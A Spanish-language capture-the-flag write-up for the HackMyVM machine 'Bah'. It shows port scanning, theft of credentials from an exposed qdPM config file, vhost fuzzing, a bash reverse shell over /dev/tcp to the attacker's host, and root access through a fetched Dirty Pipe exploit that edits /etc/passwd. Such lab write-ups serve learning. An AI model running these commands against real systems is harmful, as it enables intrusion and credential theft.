cd ~/blog

~/writeups/hmv/072-bah.md

072 - Bah

easy Linux hmv 17-04-2024
qdPM 9.2 Password ExposureVirtual host discovery + credential reuseDirty Pipe Privesc (CVE-2022-0847)
hackmyvm.eu/machines/machine.php?vm=Bah

~1 min de lectura


Comenzamos con la enumeración de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.130
 nmap -sCV -p80,3306 -oN 02-targeted.txt 192.168.1.130
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-17 18:52 -04
Nmap scan report for 192.168.1.130
Host is up (0.00032s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.18.0
|_http-title: qdPM | Login
|_http-server-header: nginx/1.18.0
3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
|_  Auth Plugin Name: mysql_native_password

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds

El login usa qdPM 9.2, vulnerable a una exposición de credenciales (el archivo de configuración de la base de datos es accesible):

 searchsploit qdPM 9.2
...
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
...

 curl http://192.168.1.130/core/config/databases.yml
...
  dsn: 'mysql:dbname=qpm;host=localhost'
  username: qpmadmin
  password: "<?php echo urlencode('qpmpazzw') ; ?>"
...

Nos conectamos a MySQL y, en la base hidden, encontramos credenciales y una lista de subdominios:

 mariadb -h 192.168.1.130 -P 3306 -u qpmadmin -p
Enter password: qpmpazzw

MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
...
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+

MariaDB [hidden]> select * from url;
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
...
|  5 | http://party.bah.hmv    |
...
+----+-------------------------+

Fuzzeamos virtual hosts de bah.hmv y encontramos party:

 wfuzz -u 'http://bah.hmv' -H 'Host: FUZZ.bah.hmv' -t 100 -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 373
...
000004991:   200        0 L      1 W        46 Ch       "party"
...

party.bah.hmv es una shell web que pide credenciales; probamos las de la tabla hidden y entramos con rocio:Ihaveaflower, lanzando una reverse shell:

rocio@bah:/home$ bash -c "bash -i >& /dev/tcp/192.168.1.3/1234 0>&1"

 ncat -nlvp 1234
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.1.130:60678.
rocio@bah:/home$

Obtenemos la primera flag. Para escalar privilegios, usamos el exploit de Dirty Pipe para inyectar un usuario root en /etc/passwd:

qpmadmin@bah:/tmp$ wget https://raw.githubusercontent.com/Al1ex/CVE-2022-0847/main/exp.cn/exp.c
qpmadmin@bah:/tmp$ cp /etc/passwd /tmp/passwd.bak
qpmadmin@bah:/tmp$ gcc exp.c -o exp
qpmadmin@bah:/tmp$ ./exp /etc/passwd 1 ootz:
It worked!

qpmadmin@bah:/tmp$ su rootz
rootz@bah:/tmp#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados